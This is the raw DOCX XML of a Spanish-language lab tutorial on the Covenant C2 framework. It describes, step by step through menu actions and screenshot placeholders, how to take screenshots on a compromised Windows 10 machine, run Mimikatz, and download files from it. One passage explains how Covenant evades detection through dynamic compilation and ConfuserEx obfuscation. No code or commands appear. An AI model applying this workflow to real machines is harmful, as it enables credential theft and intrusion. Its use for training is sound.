                    <a:blip r:embed="rId325"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D051588" w14:textId="77777777" w:rsidR="00EB1B74" w:rsidRDefault="00EB1B74" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8E615E" w14:textId="0C14141A" w:rsidR="00EB1B74" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Podremos ejecutar el comando Upload y subir un archivo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD272DA" w14:textId="77777777" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="654A6087" w14:textId="4E258089" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FC0F578" wp14:editId="41CDEBBA">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="263136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6807" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId326"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0A0AB584" w14:textId="77777777" w:rsidR="00EB1B74" w:rsidRDefault="00EB1B74" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC1C7CA" w14:textId="77777777" w:rsidR="00EB1B74" w:rsidRDefault="00EB1B74" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9B95BC" w14:textId="77777777" w:rsidR="00EB1B74" w:rsidRDefault="00EB1B74" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B984BD2" w14:textId="7AE747FB" w:rsidR="00EB1B74" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15C15AE7" wp14:editId="4AAECB60">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="161435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091" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId327"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E30641A" w14:textId="77777777" w:rsidR="00EB1B74" w:rsidRDefault="00EB1B74" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D20CBE" w14:textId="454BAD87" w:rsidR="00EB1B74" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora iremos a la pestaña Task:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1707689E" w14:textId="77777777" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="040F961A" w14:textId="7AF0C5F1" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Aquí podremos ejecutar tares predefinidas y después verlas en le promt anterior con el comando Task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FEB189" w14:textId="77777777" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56EC91E7" w14:textId="77777777" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE93493" w14:textId="600F224F" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FA4267D" wp14:editId="2EE9CDD1">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="891685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5508" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId328"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6B1300F0" w14:textId="77777777" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5572976D" w14:textId="0E7E2CDD" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora haremos una captura de pantalla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CB5C33" w14:textId="77777777" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3500D60D" w14:textId="02FBE47A" w:rsidR="00C34717" w:rsidRDefault="00AD7F15" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1478DE09" wp14:editId="7BEABE35">
            <wp:extent cx="6438095" cy="4285714"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="513623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3824" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId329">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6438095" cy="4285714"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E33A9DA" w14:textId="77777777" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E8A834" w14:textId="47F7BF80" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Para hacerla le daremos a Task:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDCB827" w14:textId="77777777" w:rsidR="00C34717" w:rsidRDefault="00C34717" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D45ED76" w14:textId="5329F083" w:rsidR="00C34717" w:rsidRDefault="00824B0A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Obteniendo una captura de pantalla de la máquina comprometida:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA821B6" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3673A421" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B446684" w14:textId="77777777" w:rsidR="008C5317" w:rsidRDefault="008C5317" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3728FD35" w14:textId="77777777" w:rsidR="008C5317" w:rsidRDefault="008C5317" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36CBEF0E" w14:textId="3A5346D0" w:rsidR="008C5317" w:rsidRDefault="00824B0A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27D07248" wp14:editId="4BA39932">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="522121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21083" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId330"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0B30C5D" w14:textId="77777777" w:rsidR="00824B0A" w:rsidRDefault="00824B0A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C155498" w14:textId="0F0B2DCB" w:rsidR="00824B0A" w:rsidRDefault="00824B0A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora vamos ejecutar Mimikatz, para esto en la pestaña de tareas seleccionaremos Mimikatz:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064A1280" w14:textId="77777777" w:rsidR="00824B0A" w:rsidRDefault="00824B0A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB931D7" w14:textId="6956351C" w:rsidR="00824B0A" w:rsidRDefault="00AD7F15" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B4064EA" wp14:editId="606C3481">
            <wp:extent cx="6447619" cy="4466667"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50351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8506" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId331">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6447619" cy="4466667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2062FC5E" w14:textId="77777777" w:rsidR="00824B0A" w:rsidRDefault="00824B0A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="760BEF2E" w14:textId="4389BFDB" w:rsidR="00824B0A" w:rsidRDefault="00824B0A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y pulsaremos en task:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC0B66A" w14:textId="77777777" w:rsidR="00824B0A" w:rsidRDefault="00824B0A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="773B6ABE" w14:textId="41F605EE" w:rsidR="00824B0A" w:rsidRDefault="00824B0A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="164E6111" wp14:editId="7CA2A85D">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1391731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1196" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId332"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E1F2C0D" w14:textId="77777777" w:rsidR="00824B0A" w:rsidRDefault="00824B0A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D3D60F" w14:textId="529DD3E5" w:rsidR="00824B0A" w:rsidRPr="00824B0A" w:rsidRDefault="00824B0A" w:rsidP="00824B0A">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="00824B0A">
        <w:t>Ejecutar Mimikatz usando Covenant ayuda a evitar la detección porque Covenant no almacena tareas directamente en el host grunt. En su lugar, compila e implementa dinámicamente la carga útil de la tarea a través de su conexión de cliente en el momento de la asignación de tareas. Además, cada vez que se crea un nuevo grunt o se asigna una nueva tarea a un grunt, el código relevante se vuelve a compilar y ofuscar con ConfuserEx, lo que evita cargas útiles estáticas que serían más fáciles de detectar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C353278" w14:textId="77777777" w:rsidR="008C5317" w:rsidRDefault="008C5317" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4466490A" w14:textId="39468BD3" w:rsidR="00824B0A" w:rsidRDefault="00824B0A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora veremos el historial de las tareas ejecutadas, para eso vamos a la última pestaña Taskings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52875792" w14:textId="77777777" w:rsidR="00824B0A" w:rsidRDefault="00824B0A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC0E095" w14:textId="74CC9D4E" w:rsidR="00824B0A" w:rsidRDefault="00824B0A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68BBAC0D" wp14:editId="1DBC95AA">
            <wp:extent cx="5400040" cy="4913906"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="385719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9725" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId333" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5401210" cy="4914971"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD4CB91" w14:textId="77777777" w:rsidR="00824B0A" w:rsidRDefault="00824B0A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2325BF7B" w14:textId="39CC1A9C" w:rsidR="00824B0A" w:rsidRDefault="00824B0A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y podremos ver todo lo que ejecutamos, para Covenant todo lo que ejecutes es una tarea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3D52F9" w14:textId="77777777" w:rsidR="000912B0" w:rsidRDefault="000912B0" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A2D0D7" w14:textId="5034910C" w:rsidR="000912B0" w:rsidRDefault="000912B0" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Podremos ver los parámetros de la tarea y el resultado si hacemos clic en ella:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1183528B" w14:textId="77777777" w:rsidR="000912B0" w:rsidRDefault="000912B0" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50690224" w14:textId="533E3609" w:rsidR="000912B0" w:rsidRDefault="000912B0" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14ABE2A5" wp14:editId="0AB873F9">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="113999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2591" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId334"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4C61D1B0" w14:textId="77777777" w:rsidR="000912B0" w:rsidRDefault="000912B0" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A9F595" w14:textId="56E453B0" w:rsidR="000912B0" w:rsidRDefault="000912B0" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Como por ejemplo este caso la captura de pantalla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CABE179" w14:textId="77777777" w:rsidR="00D953EA" w:rsidRDefault="00D953EA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7260E294" w14:textId="4D68BAEC" w:rsidR="00D953EA" w:rsidRDefault="00D953EA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora vamos a descargar un archivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B03A54" w14:textId="77777777" w:rsidR="00D953EA" w:rsidRDefault="00D953EA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30AD195B" w14:textId="21940593" w:rsidR="00D953EA" w:rsidRDefault="00D953EA" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Para esto vamos ejecutar la tarea Downloads</w:t>
      </w:r>
      <w:r w:rsidR="001563B5">
        <w:t xml:space="preserve">, para esta prueba descargaré el ejecutable del servidor ftp que </w:t>
      </w:r>
      <w:r w:rsidR="004B1149">
        <w:t>está</w:t>
      </w:r>
      <w:r w:rsidR="001563B5">
        <w:t xml:space="preserve"> en el escritorio de la máquina Windows10:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06966FC7" w14:textId="77777777" w:rsidR="008C5317" w:rsidRDefault="008C5317" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6360A855" w14:textId="77777777" w:rsidR="008C5317" w:rsidRDefault="008C5317" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F7DBF68" w14:textId="77777777" w:rsidR="008C5317" w:rsidRDefault="008C5317" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30379489" w14:textId="77777777" w:rsidR="008C5317" w:rsidRDefault="008C5317" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07027A66" w14:textId="77777777" w:rsidR="008C5317" w:rsidRDefault="008C5317" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="204C0B81" w14:textId="77777777" w:rsidR="008C5317" w:rsidRDefault="008C5317" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C59D105" w14:textId="737A7B70" w:rsidR="008C5317" w:rsidRDefault="00CE724D" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CDE5A5E" wp14:editId="6033114D">
            <wp:extent cx="5400040" cy="4405022"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6785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294" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId335" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5402921" cy="4407372"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1313A2B4" w14:textId="77777777" w:rsidR="00CE724D" w:rsidRDefault="00CE724D" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A2131F" w14:textId="1AB6589D" w:rsidR="00CE724D" w:rsidRDefault="00CE724D" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Colocaremos la ruta </w:t>
      </w:r>
      <w:r w:rsidR="00C66ABC">
        <w:t>del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> archivo en la máquina atacada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091D102B" w14:textId="77777777" w:rsidR="00CE724D" w:rsidRDefault="00CE724D" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DFE245A" w14:textId="55FFFD01" w:rsidR="008C5317" w:rsidRDefault="001E0CA9" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="338346AB" wp14:editId="23915A47">
            <wp:extent cx="5427827" cy="3570135"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="1459220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0976" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId336">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5429886" cy="3571489"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C75DDD" w14:textId="77777777" w:rsidR="008C5317" w:rsidRDefault="008C5317" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D094ADE" w14:textId="64127E0C" w:rsidR="008C5317" w:rsidRDefault="00774F5A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="347A84ED" wp14:editId="5A0AD7F9">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1533605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05897" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId337" cstate="screen">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6D5F479" w14:textId="77777777" w:rsidR="00774F5A" w:rsidRDefault="00774F5A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D39AD82" w14:textId="7F67044C" w:rsidR="00774F5A" w:rsidRDefault="00774F5A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Si hacemos clic en el enlace descargaremos el archivo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6719C76A" w14:textId="77777777" w:rsidR="00774F5A" w:rsidRDefault="00774F5A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3101804F" w14:textId="520863F3" w:rsidR="00774F5A" w:rsidRDefault="00774F5A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26EF49F4" wp14:editId="0499D745">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1036777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7373" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId338" cstate="screen">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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33083447" w14:textId="77777777" w:rsidR="00774F5A" w:rsidRDefault="00774F5A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BE50BF4" w14:textId="644E0251" w:rsidR="00774F5A" w:rsidRDefault="00774F5A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora iremos a Taskings e elegiremos la tarea de la descarga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006C9221" w14:textId="77777777" w:rsidR="00774F5A" w:rsidRDefault="00774F5A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
